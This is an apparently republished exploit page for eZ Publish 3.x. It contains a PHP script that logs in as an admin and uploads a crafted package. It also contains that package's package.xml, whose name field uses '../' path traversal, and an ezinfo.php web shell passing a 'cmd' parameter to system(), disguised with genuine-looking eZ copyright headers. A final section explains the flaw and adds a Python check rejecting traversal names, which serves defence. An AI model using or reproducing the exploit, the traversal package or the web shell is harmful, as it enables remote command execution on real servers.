eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req)
Source: s4avrd0w@p0c.ru  Author: s4avrd0w  Published: 2008-12-12

// eZPublish_abuse_of_functionality_zero_day.php

--------------------------------------------------------------

<?php

/*
 eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru]
 Versions affected 3.x

 * tested on version 3.9.0, 3.9.5, 3.10.1

 Requirements: the pecl_http 1.x extension (HttpRequest / HttpException classes)
 and the package archive ez_exploit.ezpkg in the current working directory.

 usage:

 # ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server

 The options are required:

 -u Login of an existing admin on eZ Publish
 -p Admin password on eZ Publish
 -s Target eZ Publish admin interface

 example:

 # ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
 [+] Exploit successfully sending
 [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
*/

function help_argc($script_name)
{
    print "
usage:

# ./" . $script_name . " -u=username -p=password -s=EZPublish_server

The options are required:
 -u Login of an existing admin on eZ Publish
 -p Password of that admin on eZ Publish
 -s Target eZ Publish admin interface

example:

# ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
[+] Exploit successfully sending
[+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
";
}

function successfully($server)
{
    // Keep only host (and port) of the admin URL; the command endpoint is the
    // site's ezinfo/about view, not a path below the admin interface.
    $host = parse_url($server, PHP_URL_HOST);
    $port = parse_url($server, PHP_URL_PORT);
    if ($port) {
        $host .= ':' . $port;
    }

    print "
[+] Exploit successfully sending
[+] For OS Commanding executing go to: http://$host/ezinfo/about?cmd=<OScommand>
";
}

if ($argc != 4 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
    help_argc($argv[0]);
    exit(0);
}
else
{
    // Parse "-x=value" options into $ARG['x'] = 'value'.
    $ARG = array();
    foreach ($argv as $arg) {
        if (strpos($arg, '-') === 0) {
            $key = substr($arg, 1, 1);
            if (!isset($ARG[$key])) $ARG[$key] = substr($arg, 3);
        }
    }

    if (!empty($ARG['u']) && !empty($ARG['p']) && !empty($ARG['s']))
    {
        if (file_exists("ez_exploit.ezpkg"))
        {
            // Strip a trailing slash so the view paths below are not doubled.
            $server = rtrim($ARG['s'], '/');

            $post_login_fields = array(
                'Login' => $ARG['u'],
                'Password' => $ARG['p'],
                'LoginButton' => '1',
                'RedirectURI' => ''
            );

            $headers = array(
                'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
                'Referer' => $ARG['s']
            );

            // Step 1: log in to the admin interface.
            $res_http = new HttpRequest($server . "/user/login", HttpRequest::METH_POST);
            $res_http->addPostFields($post_login_fields);
            $res_http->addHeaders($headers);
            try {
                $http_response = $res_http->send();

                // A "message-warning" box in the response is treated as a failed login.
                if (stripos($http_response->getBody(), "message-warning") !== false)
                {
                    print "[-] Login failed";
                    exit(0);
                }
                else
                {
                    $http_headers = $http_response->getHeaders();

                    if (!empty($http_headers['Set-Cookie']))
                    {
                        // Reuse the session cookie (name=value before the first ';').
                        $eZcookie = explode(";", $http_headers['Set-Cookie']);
                        $eZadmcookie = explode("=", $eZcookie[0], 2);

                        $cookies = array(
                            $eZadmcookie[0] => $eZadmcookie[1]
                        );

                        $post_fields = array(
                            'MAX_FILE_SIZE' => '32000000',
                            'UploadPackageButton' => '1'
                        );

                        // Step 2: upload the package through the package/upload view.
                        $res_http = new HttpRequest($server . "/package/upload", HttpRequest::METH_POST);
                        $res_http->addPostFields($post_fields);
                        $res_http->addHeaders($headers);
                        $res_http->addCookies($cookies);
                        $res_http->addPostFile("PackageBinaryFile", "ez_exploit.ezpkg", "multipart/form-data");
                        try {
                            $http_response = $res_http->send();

                            // A re-displayed upload form (UploadPackageButton) is treated as a rejected import.
                            if (stripos($http_response->getBody(), "UploadPackageButton") === false)
                            {
                                successfully($ARG['s']);
                            }
                            else
                            {
                                print "[-] Exploit failed";
                            }

                        } catch (HttpException $exception) {
                            print "[-] Not connected";
                            exit(0);
                        }
                    }
                    else
                    {
                        print "[-] Error getting cookie";
                    }
                }

            } catch (HttpException $exception) {
                print "[-] Not connected";
                exit(0);
            }
        }
        else
        {
            print "[-] File ez_exploit.ezpkg not found\n";
            print "[-] Exploit failed";
        }
    }
    else
    {
        help_argc($argv[0]);
        exit(0);
    }
}

?>

-------------------------------------------------------------

// ezinfo.php

-------------------------------------------------------------

<?php
print "<pre>";
system($_GET['cmd']);
print "</pre>";

//
// SOFTWARE NAME: eZ publish
// SOFTWARE RELEASE: 3.9.0
// BUILD VERSION: 17785
// COPYRIGHT NOTICE: Copyright (C) 1999-2006 eZ systems AS
// SOFTWARE LICENSE: GNU General Public License v2.0
// NOTICE: >
//   This program is free software; you can redistribute it and/or
//   modify it under the terms of version 2.0  of the GNU General
//   Public License as published by the Free Software Foundation.
//
//   This program is distributed in the hope that it will be useful,
//   but WITHOUT ANY WARRANTY; without even the implied warranty of
//   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//   GNU General Public License for more details.
//
//   You should have received a copy of version 2.0 of the GNU General
//   Public License along with this program; if not, write to the Free
//   Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
//   MA 02110-1301, USA.
//
//

class ezdhtmlInfo
{
    function info()
    {
        return array( 'Name' => "eZ Online Editor",
                      'Version' => "4.2",
                      'Copyright' => "Copyright (C) 1999-2006 eZ systems AS",
                      'License' => "GNU General Public License v2.0",
                    );
    }
}
?>

---------------------------------------------------------------------------------

// package.xml

---------------------------------------------------------------------------------

<?xml version="1.0" encoding="UTF-8"?>
<package version="3.8.0"
         development="false"
         is_active="true"
         install_type="import">
  <name>../../../../extension/ezdhtml</name>
  <summary>Website Interface</summary>
  <description>Website Interface is a web based CMS solution based on eZ Publish. It contains templates and settings that meets the most common requirements for content management systems.</description>
  <vendor>eZ systems</vendor>
  <type value="site" />
  <ezpublish>
    <version>3.8.0</version>
    <named-version>3.8</named-version>
  </ezpublish>
  <maintainers>
    <maintainer>
      <name>Administrator User</name>
      <email>nospam@ez.no</email>
      <role>lead</role>
    </maintainer>
  </maintainers>
  <packaging>
    <timestamp>1153313252</timestamp>
    <host>packages.jkn.ez.no</host>
  </packaging>
  <documents>
    <document mime-type="text/plain" name="LICENCE" />
  </documents>
  <changelog>
    <entry person="Administrator User" email="nospam@ez.no" release="1">
      <change>Creation of package.</change>
    </entry>
  </changelog>
</package>

------------------------------------------------------------------------------------------------
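The whole bug sits in the package.xml above: its <name> element is a relative path that climbs four levels out of the package repository into extension/ezdhtml, so the archive's ezinfo.php overwrites that extension's info file and is executed by the ezinfo/about view. An importer that uses the name as a directory must reject anything that is not a single plain path component. The check below is an added example written for this page, not eZ Publish's own code: it is in Python rather than PHP, parses a constructed copy of the page's package.xml, and assumes a placeholder repository directory (PACKAGES_ROOT) whose depth matches the four "../" in the name.

```python
import posixpath
import xml.etree.ElementTree as ET

# Constructed copy of the page's package.xml, trimmed to the fields the check needs.
PACKAGE_XML_TRAVERSAL = """<?xml version="1.0" encoding="UTF-8"?>
<package version="3.8.0" development="false" is_active="true" install_type="import">
  <name>../../../../extension/ezdhtml</name>
  <summary>Website Interface</summary>
  <type value="site" />
</package>
"""
# Constructed benign counterpart: a plain package name.
PACKAGE_XML_BENIGN = PACKAGE_XML_TRAVERSAL.replace("../../../../extension/ezdhtml", "ezwebin_site")

# Assumed repository directory for imported packages (placeholder layout, not a verified eZ Publish default).
PACKAGES_ROOT = "/var/www/ezpublish/var/storage/packages/local"


def package_name(package_xml: str) -> str:
    """Return the text of the <name> element, or '' if it is missing."""
    node = ET.fromstring(package_xml.encode("utf-8")).find("name")
    return (node.text or "").strip() if node is not None else ""


def unchecked_install_path(package_xml: str, packages_root: str = PACKAGES_ROOT) -> str:
    """Where a naive join of root and name lands; with the page's name this leaves the root."""
    return posixpath.normpath(posixpath.join(packages_root, package_name(package_xml)))


def is_safe_package_name(name: str, packages_root: str = PACKAGES_ROOT) -> bool:
    """Accept only a single plain path component that stays directly under packages_root."""
    # Syntactic test: not empty, no dot entries, no separators, no NUL byte.
    if not name or name in (".", "..") or any(c in name for c in "/\\\0"):
        return False
    # Semantic test: the normalised target's parent directory must be the root itself.
    target = posixpath.normpath(posixpath.join(packages_root, name))
    return posixpath.dirname(target) == packages_root.rstrip("/")


def install_path_for(package_xml: str, packages_root: str = PACKAGES_ROOT) -> str:
    """Resolve the unpack directory, refusing any name that is not a plain directory name."""
    name = package_name(package_xml)
    if not is_safe_package_name(name, packages_root):
        raise ValueError(f"refusing package name {name!r}")
    return posixpath.join(packages_root, name)
```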

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved